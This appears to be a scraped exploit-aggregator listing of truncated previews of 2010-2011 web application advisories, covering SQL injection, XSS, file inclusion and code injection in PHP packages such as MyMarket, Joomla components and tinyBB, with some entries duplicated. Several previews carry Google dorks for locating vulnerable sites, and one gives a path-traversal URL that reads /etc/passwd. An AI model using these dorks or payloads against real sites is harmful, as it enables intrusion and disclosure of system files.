MyMarket 1.71 SQL Injection

Exploit Title: MyMarket version 1.71index.php sql Injection Google Dork: allinurl:mymarket/shopping/index.php Date: 7-2-2011 Author: ahmadso Version: 1.71 Tested on: win xp sp2 ==================================================== http://www.site.com/mymarket/shopping/index.php?id= SQL Codes...

MyMarket 1.71 - index.php SQL Injection

MyMarket 1.71 - index.php SQL Injection Exploit Title: MyMarket version 1.71index.php sql Injection Google Dork: allinurl:mymarket/shopping/index.php Date: 7-2-2011 Author: ahmadso Version: 1.71 Tested on: win xp sp2 ====================================================...

Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection

Dew-NewPHPLinks v.2.1b index.php Sql Injection Vulnerability ====================================================================== .:. Author : AtT4CKxT3rR0r1ST [email protected] .:. Script : http://www.dew-code.com/ .:. Dork : "Powered By Dew-NewPHPLinks v.2.1b" .:. Special Gr34T$ T0 ZaIdOoHxHaCkEr =...

Dew-NewPHPLinks 2.1b - index.php SQL Injection

Dew-NewPHPLinks 2.1b - index.php SQL Injection Dew-NewPHPLinks v.2.1b index.php Sql Injection Vulnerability ====================================================================== .:. Author : AtT4CKxT3rR0r1ST [email protected] .:. Script : http://www.dew-code.com/ .:. Dork : "Powered By Dew-NewPHPLinks...

CVE-2010-4718

Multiple cross-site scripting XSS vulnerabilities in the Lyftenbloggie comlyftenbloggie component 1.1.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the 1 tag and 2 category parameters to index.php...

TinyWebGallery 1.8.3 Cross Site Scripting / Directory Traversal

Date: 01/02/2011 dd/MM/yyyy Script: TinyWebGallery Version: 1.8.3 No fixes yet, might work on other versions too. Home: http://www.tinywebgallery.com -- Vulnerability: Non-persistent XSS Where: File: /admin/index.php Parameters: sview, tview, dir, item. Examples:...

RW-Download 4.0.6 - index.php SQL Injection

RW-Download 4.0.6 - index.php SQL Injection /////////////////////////Dr.NeT/////////////////////////////////Dr.NeT//////////////////////Dr.NeT////////// //Title ||= RW-Download v4.0.6 = index.php SQL Injection Vulnerability // //Secript ||= RW-Download // //Language||= Php // //Download||=...

RW-Download 4.0.6 - 'index.php' SQL Injection

/////////////////////////Dr.NeT/////////////////////////////////Dr.NeT//////////////////////Dr.NeT////////// //Title ||= RW-Download v4.0.6 = index.php SQL Injection Vulnerability // //Secript ||= RW-Download // //Language||= Php // //Download||=...

MultiCMS Local File Inclusion

=============================wwwdotWhiteponnydotcom============================= Date: 29/01/2011 Author: R3VANBASTARD Exploit Title: MultiCMS File Inclusion Vulnerbility Vendor: http://www.multicms.net Status: FIXED Tested on: Windows 7 Dork: "Redakcní systém MultiCMS" Mail:...

Code injection

Static code injection vulnerability in Simploo CMS 1.7.1 and earlier allows remote authenticated users to inject arbitrary PHP code into config/custom/base.ini.php via the ftpserver parameter FTP-Server field to the sicore/updates/optionssav operation for index.php...

CVE-2011-0635

Static code injection vulnerability in Simploo CMS 1.7.1 and earlier allows remote authenticated users to inject arbitrary PHP code into config/custom/base.ini.php via the ftpserver parameter FTP-Server field to the sicore/updates/optionssav operation for index.php...

CVE-2011-0635

CVE-2011-0635 affects Simploo CMS 1.7.1 and earlier. The vulnerability is a static code injection flaw where remote authenticated users can inject arbitrary PHP into config/custom/base.ini.php via the ftpserver parameter (FTP-Server field) to the sicore/updates/optionssav operation of index.php. ...

Multiple Vulnerabilities in ReOS

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in ReOS which could be exploited to perform SQL injection attacks and compromise vulnerable system. 1 SQL injection vulnerabilities in ReOS 1.1 The vulnerability exists due to input sanitation errors in the...

CmsEasp 2.0.0 LFI vulnerability

易通企业网站系统也称易通企业网站程序，是易通公司开发中国首套免费提供企业网站模板的营销型企业网站管理系统，系统前台生成html、完全符合SEO、同时有在线客服、潜在客户跟踪、便捷企业网站模板制作、搜索引擎推广等功能的企业网站系统。 CmsEasp 2.0.0 null http://server/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00...

Sql injection

Multiple SQL injection vulnerabilities in Joomla! 1.5.x before 1.5.22 allow remote attackers to execute arbitrary SQL commands via the 1 filterorder or 2 filterorderDir parameter in a comcontact action to index.php, a different vulnerability than CVE-2010-4166. NOTE: the provenance of this...

Joomla! Component com_people 1.0.0 - Local File Inclusion

Author : altbta [email protected] Home : xp10.com Script : Joomla Component compeople Bug Type : Local File Inclusion Vulnerability Dork : inurl:"/index.php?option=compeople" Vendor : http://www.ptt-solution.com === Exploit === LFI...

LifeType 1.2.10 HTTP Referer stored XSS

Exploit for php platform in category web applications Exploit Title: lifetype 1.2.10 http referer XSS Date: 11-1-2010 Author: Saif El-Sherei Software Link: http://lifetype.net/page/downloads Version: 1.2.10 Tested on: firefox 3.0.15 failure to sanitize the http referer header in index.php results...

PT-2011-2346 · Tinybb · Tinybb

Name of the Vulnerable Software and Affected Versions: tinyBB version 1.2 Description: The issue allows remote attackers to execute arbitrary SQL commands when magic quotes gpc is disabled. This can be achieved via the id parameter in a profile action to "index.php". Recommendations: For tinyBB...

CVE-2011-0005

Cross-site scripting XSS vulnerability in the comsearch module for Joomla! 1.0.x through 1.0.15 allows remote attackers to inject arbitrary web script or HTML via the ordering parameter to index.php...

Elxis CMS 2009.2 Remote file include vulnerbility

Exploit for php platform in category web applications elxis2009.2electrarev2631 installation folder.'; include$mosConfigabsolutepath.'/includes/systemplates/router.php'; exit; requireonce$mosConfigabsolutepath.'/includes/Core/loader.php'; file : index2.php...